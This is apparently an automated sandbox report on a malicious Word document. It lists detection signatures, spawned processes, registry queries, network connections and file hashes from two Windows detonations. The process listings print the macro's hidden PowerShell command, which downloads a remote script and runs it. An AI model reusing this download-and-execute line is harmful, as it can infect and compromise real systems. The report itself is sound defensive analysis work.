Analysis Overview
SHA256
9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315
Threat Level: Known bad
The file 9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Command and Scripting Interpreter: PowerShell
Office macro that triggers on suspicious action
Suspicious Office macro
Drops file in Windows directory
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-03 21:08
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-03 21:08
Reported
2024-11-03 21:11
Platform
win7-20240903-en
Max time kernel
119s
Max time network
122s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -w hidden -noninteractive "IEX((new-object net.webclient).downloadstring('http://127.0.0.1:8000/arquivos/windows.txt'))"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:8000 | tcp |
Files
memory/1696-0-0x000000002F521000-0x000000002F522000-memory.dmp
memory/1696-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1696-2-0x00000000717AD000-0x00000000717B8000-memory.dmp
memory/1696-10-0x0000000000370000-0x0000000000470000-memory.dmp
memory/1696-7-0x0000000000370000-0x0000000000470000-memory.dmp
memory/1696-6-0x0000000000370000-0x0000000000470000-memory.dmp
memory/1696-5-0x0000000000370000-0x0000000000470000-memory.dmp
memory/1696-4-0x0000000000370000-0x0000000000470000-memory.dmp
memory/1696-15-0x0000000000370000-0x0000000000470000-memory.dmp
memory/1696-14-0x0000000000370000-0x0000000000470000-memory.dmp
memory/2704-18-0x00000000002F0000-0x00000000002F9000-memory.dmp
memory/1696-19-0x00000000717AD000-0x00000000717B8000-memory.dmp
memory/1696-20-0x0000000000370000-0x0000000000470000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-03 21:08
Reported
2024-11-03 21:11
Platform
win10v2004-20241007-en
Max time kernel
139s
Max time network
143s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 620 wrote to memory of 1364 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 620 wrote to memory of 1364 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cc036b0879d125d24401d0a89743fe5ace701dd6e107ea700f4adddb0238315.doc" /o ""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -w hidden -noninteractive "IEX((new-object net.webclient).downloadstring('http://127.0.0.1:8000/arquivos/windows.txt'))"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| US | 95.100.195.47:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.20.12.74:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 47.195.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
Files
memory/620-1-0x00007FFE9042D000-0x00007FFE9042E000-memory.dmp
memory/620-0-0x00007FFE50410000-0x00007FFE50420000-memory.dmp
memory/620-2-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-6-0x00007FFE50410000-0x00007FFE50420000-memory.dmp
memory/620-5-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-7-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-8-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-4-0x00007FFE50410000-0x00007FFE50420000-memory.dmp
memory/620-9-0x00007FFE50410000-0x00007FFE50420000-memory.dmp
memory/620-10-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-3-0x00007FFE50410000-0x00007FFE50420000-memory.dmp
memory/620-11-0x00007FFE4DAB0000-0x00007FFE4DAC0000-memory.dmp
memory/620-13-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-15-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-17-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-19-0x00007FFE4DAB0000-0x00007FFE4DAC0000-memory.dmp
memory/620-18-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-16-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-14-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-12-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-31-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-30-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/1364-35-0x00000254E25E0000-0x00000254E2602000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbewux1h.jou.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
| MD5 | d29962abc88624befc0135579ae485ec |
| SHA1 | e40a6458296ec6a2427bcb280572d023a9862b31 |
| SHA256 | a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866 |
| SHA512 | 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f |
memory/620-55-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-56-0x00007FFE9042D000-0x00007FFE9042E000-memory.dmp
memory/620-57-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/620-58-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 61b343870852ccc0e70c8d8c3bb4cc8c |
| SHA1 | c0dcaee03722a93eab2fcfd618392bb33b5c84df |
| SHA256 | 3869ac37373af3706ac20ffa74d1de3a9bf15af52e7e9cb0a2374fca22cdc261 |
| SHA512 | 1045cc8cf850a807ab9539e714cdeb7750b8da5751d40a634934845aec2094069a8a1c43c888c401424733b43c6d8227d2f7f478b9bdd79bf668ee3891f28b2f |
memory/620-67-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TCDEFB4.tmp\gb.xsl
| MD5 | 51d32ee5bc7ab811041f799652d26e04 |
| SHA1 | 412193006aa3ef19e0a57e16acf86b830993024a |
| SHA256 | 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97 |
| SHA512 | 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810 |